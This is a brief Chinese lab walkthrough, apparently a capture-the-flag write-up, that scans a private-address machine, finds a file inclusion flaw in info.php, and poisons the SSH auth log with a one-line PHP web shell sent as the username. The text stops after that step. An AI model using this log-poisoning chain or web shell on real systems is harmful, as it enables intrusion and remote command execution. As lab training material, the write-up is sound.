1.信息收集
arp-sacn -l

2、扫描端口
nmap -T4 -sV -O -p 22,80 192.168.48.148

3.扫描80端口
dirb http://192.168.48.148

4.访问http://192.168.48.148/antibot_image

发现存在目录 antibots,接着访问该目录,发现存在很多文件

找到 phpinfo 的信息,F12查看源码发现 hint,存在文件包含漏洞

先查看日志文件是不是在默认路径:http://192.168.48.148/antibot_image/antibots/info.php?image=/var/log/auth.log

利用 ssh 连接,写入一句话木马:
ssh '<?php system($_GET['1']);?>'@192.168.48.148 -p 2211

2391

被折叠的 条评论
为什么被折叠?



